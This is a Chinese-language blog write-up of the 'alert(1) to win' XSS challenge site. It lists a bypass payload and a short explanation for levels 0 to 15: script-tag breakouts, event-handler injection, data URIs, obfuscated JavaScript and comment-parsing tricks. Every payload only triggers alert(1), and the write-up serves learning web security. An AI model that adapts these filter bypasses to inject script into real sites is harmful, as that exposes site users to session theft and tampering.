"alert(1) to win" writeup
level 0: 注意补全,");alert(1)//
level 1: 通过添加反斜线使用来转义的反斜线变为字符,\");alert(1)//
level 2: 双引号,反斜杠都被转义了……没想到办法,就搜了搜,原来可以直接不管双引号而闭合<script>
标签,可能优先级不同吧,</script><script>alert(1)//
level 3: JSON.stringify() 方法可以将任意的 JavaScript 值序列化成 JSON 字符串。,<a>
标签的href属性可执行js代码,尝试补全双引号,插入自己的js代码,直接插入会被转义,使用URLencode可绕过,%22),alert(1)(%22
level 4: 这个题需要仔细地观察正则式,注意到 "
仅仅替换了一次,<a>
标签中不能有空白符比较难用,而 <img>
标签中的第二个匹配文本允许除换行符以外的任意字符,这个就比较好用了,注意闭合引号就好了,[[1|2"" onload=alert(1) "]]
level 5: 这是第4题的升级版,"
全部被替换了,因此第4题的方法行不通了,对"
进行编码也行不通,百思不得其解啊,无奈看了看评论,得到解答 [[1|http://onload='alert(1)']]
,原来是同时利用 <img>
标签跟 <a>
标签啊!看看输出的源码就会发现,成功绕过了 "
!
level 6: 以 #
作为分隔符输入两个参数,如果 #
前面是 Element
结果就是创建一个新的节点,具体什么节点由 #
后面指定,而如果 #
前面是 Comment
,那么 #
后面就变成注释内容,闭合注释符号然后写入自己的代码即可, Comment#><script>alert(1)</script><!
level 7: 仍然是以 #
作为分隔符输入两个参数,对第一个参数做正则匹配,注意匹配的字符中包括单引号 '
,这是本题的关键,使用单引号和注释符号来隔离 json 字符串中碍事的字符,就可以构造出来了,'#';alert(1)//
level 8: 使用 Data URI,插入一个 html 文档,</script><script src=data:text/html,%61%6c%65%72%74(1)>
level 9: 其中一个答案
"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//
不过没看懂,详见http://www.pwntester.com/blog/2014/01/08/escape-alf-nu-xss-challenges-write-ups-part-257/
level 10: 仔细分析代码可知,输入被js加入到<a>
标签中,但是加入之前做了编码转换,但是没有对输入的\
进行编码,因此我们可以利用16进制或8进制编码被过滤的符号来进行注入,其中一个答案是:\x3cimg src=# onerror=alert(1)\x3e
level 11: 在 level 2 的基础上加了将输入中的</script
字符串(忽略大小写)全部替换为空串,但是并没有递归匹配,因此可以构造一个字符串使被替换后剩下的字符串仍然能拼出</script
,例如:</scr</scriptipt><script>alert(1)//
level 12: 跟 level 7 类似,只不过这次过滤的是/
,因此要找一种不同的方式来注释掉多余的字符,答案是:'#';alert(1)<!--
level 13: 关键是触发
tag.onload = function() {
if (youWon) alert(1);
};
答案是name="youWon"
level 14: HTML5解析器会将<!--<script>
到</script>
之间的任何东西都当作 JS
代码处理,同时要确保代码中还有一个-->
来防止解析器报语法错误,我们可以注入if(alert(1)/*<!--<script>
,结果代码就变为
var url = "if(alert(1)/*<!--<script>"; // We'll use this later </script>
<!-- for debugging -->
URL: if(alert(1)/*<!--<script>
<!-- then suddenly -->
<script>
if (!/^http:.*/.test(url)) console.log("Bad url: " + url);
else new Image().src = url;
level 15: 与 level 14 类似,但是需要自己注入-->
来闭合标签,答案是:<!--<script>#)/;alert(1)//-->
,结果代码变为
<script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")</script>
<script>
标签内的代码被解析为
console.log("junk_string") < /junk_regexp/ ; alert(1) // -->
其中,junk_string:<!--<script>
,junk_regexp: script><script>console.log(")
"alert(1) to win" writeup的更多相关文章
- 【alert(1) to win】不完全攻略
alert(1) to win 一个练习XSS的平台,地址:https://alf.nu/alert1 Warmup 给出了一段JavaScript代码 function escape(s) { re ...
- alert(1) to win Part Ⅰ
alert(1) to win Adobe: function escape(s) { s = s.replace(/"/g, '\\"'); return '<script ...
- 【20171027中】alert(1) to win 第13,14,15,16题
第13题 题目: function escape(s) { var tag = document.createElement('iframe'); // For this one, you get t ...
- 【20171027早】alert(1) to win 第9,10,11,12题
人在江湖,不服就干! 第9题: function escape(s) { function htmlEscape(s) { return s.replace(/./g, function(x) { r ...
- 【20171026早】alert(1) to win - 第六、七、八题
早上7点起床,又写了一篇小说发在了起点网上,有兴趣的可以看看.点击这里 忙完后,继续练习,刚开始发现自己答题的速度有些慢,可能是因为对于html,javascript知识不是很精通,但是话又说回来,谁 ...
- 【20171025晚】alert(1) to win 第五题 正则表达式过滤
吃过晚饭,再练一题 第五题 function escape(s) { var text = s.replace(/</g, '<').replace(/"/g, '"' ...
- 【20171025中】alert(1) to win 脚本渲染自建
游戏误人生,一下午玩了将近四个小时的三国杀,后悔不已,然后重新拾起xss challenge,突发奇想,自己构建渲染后的html. 从最简单的开始. 自动检测html: <!DOCTYPE ht ...
- 【20171025早】alert(1) to win 练习
本人黑绝楼,自称老黑,男,25岁,曾经在BAT工作过两年,但是一直都是底层人员,整天做重复性工作,甚敢无趣,曾和工作十年之久的同事聊天,发现对方回首过往,生活是寡淡如水,只有机械性工作.旋即老黑毅然决 ...
- alert(1) to win部分解题
XSS在线习题分析 (https://alf.nu/alert1) 1. Warmup function escape(s) { return '<script>console.log(& ...
随机推荐
- Confluence 6.15 博客页面(Blog Posts)宏参数
参数是让你可以用来控制宏的格式和输出的选项.在 Confluence 存储格式或者 Wiki 标记(wikimarkup)中使用的参数名与在宏浏览器中使用的标签名是不同的,在下面我们将会用括号列出 ...
- 《新年Flag》2019年“新年Flag” - 新目标 学习计划
<新年Flag>2019年"新年Flag" - 新学期 新目标 学习计划 达叔终于等到你了~ 先做个自我介绍: [达叔小生:往后余生,唯独有你]小程序 -> 后端 ...
- JavaWeb-SpringSecurity在数据库中查询登陆用户
系列博文 项目已上传至guthub 传送门 JavaWeb-SpringSecurity初认识 传送门 JavaWeb-SpringSecurity在数据库中查询登陆用户 传送门 JavaWeb-Sp ...
- CSP2019游(AFO?)记
Day 1 不知道为啥一看到\(T1\)就想到\(longlong\)可能存不下,试了下果然. \(T2\)想了半个小时胡出个\(O(n)\)算法,但是假了.冷静了一下,做了前缀和之后,合法的子区间\ ...
- scrapy pipeline
pipeline的四个方法 @classmethod def from_crawler(cls, crawler): """ 初始化的时候,用以创建pipeline对象 ...
- 线程系列4--Java线程范围内的共享数据(一)
这张图片是我看传智播客的视频时的截屏,这个图片很直观的展示了线程范围内的数据共享.当同一个线程在执行三个不同业务模块时,这三个业务模块访问的数据是共享的.更直白的说,当一个执行线索在穿个每个业务模块时 ...
- js向input的value赋值
js与jquery:在我印象里面都是一样的,今天利用空闲的时间来总结一下,js与jquery究竟有什么区别? js : 是一门网页的脚本语言 jquery :jquery是基于js的一种框架,也就是说 ...
- Django入门------常见问题
项目启动后仅本机可访问 1.修改 Django项目中的settings.py中的 ALLOWED_HOSTS 的值为 ['*']# 准许那些地址访问,* 表示任意地址ALLOWED_HOSTS = [ ...
- 开源缓存框架之ASimpleCache
ASimpleCache 是一个为android制定的 轻量级的 开源缓存框架.轻量到只有一个java文件(由十几个类精简而来). 1.它可以缓存什么东西? 普通的字符串.JsonObject.Jso ...
- 数据分析 - numpy 模块
numpy 概述 ▨ Numerical Python. 补充了python所欠缺的数值计算能力 ▨ Numpy是其他数据分析及机器学习库的底层库 ▨ Numpy完全标准C语言实现,运行效率充分 ...